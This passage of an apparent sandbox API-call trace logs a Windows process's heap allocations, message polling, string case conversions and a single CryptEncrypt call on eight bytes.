wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0244.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0244.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0244.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0244.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0244.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0244.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0244.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0244.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0244.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0244.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0244.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.513] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0244.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0244.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0244.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0244.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0244.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0244.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0244.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0244.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0244.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0244.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0244.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0244.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0244.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0244.514] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0244.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0244.515] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0244.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.516] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.516] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0244.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.516] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.517] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0244.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0244.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.517] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0244.518] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0244.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0244.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0244.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0244.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0244.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0244.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0244.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0244.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0244.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0244.522] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b1798*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b1798*, pdwDataLen=0x8bef68*=0x8) returned 1 [0244.522] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.522] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.522] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.522] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.522] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.522] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.522] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.522] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0244.522] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.522] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0244.522] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.522] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.522] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0244.522] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.523] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0244.523] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.523] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.523] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.523] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.523] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0244.523] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.523] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0244.523] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.523] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.523] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.523] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.523] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.523] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.523] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.523] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.532] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.532] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.532] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0244.532] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0244.532] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0244.532] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0244.533] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0244.533] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.533] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0244.533] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.533] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0244.533] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0244.533] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.533] CryptDestroyKey (hKey=0xaa5860) returned 1 [0244.533] PeekMessageW (in: 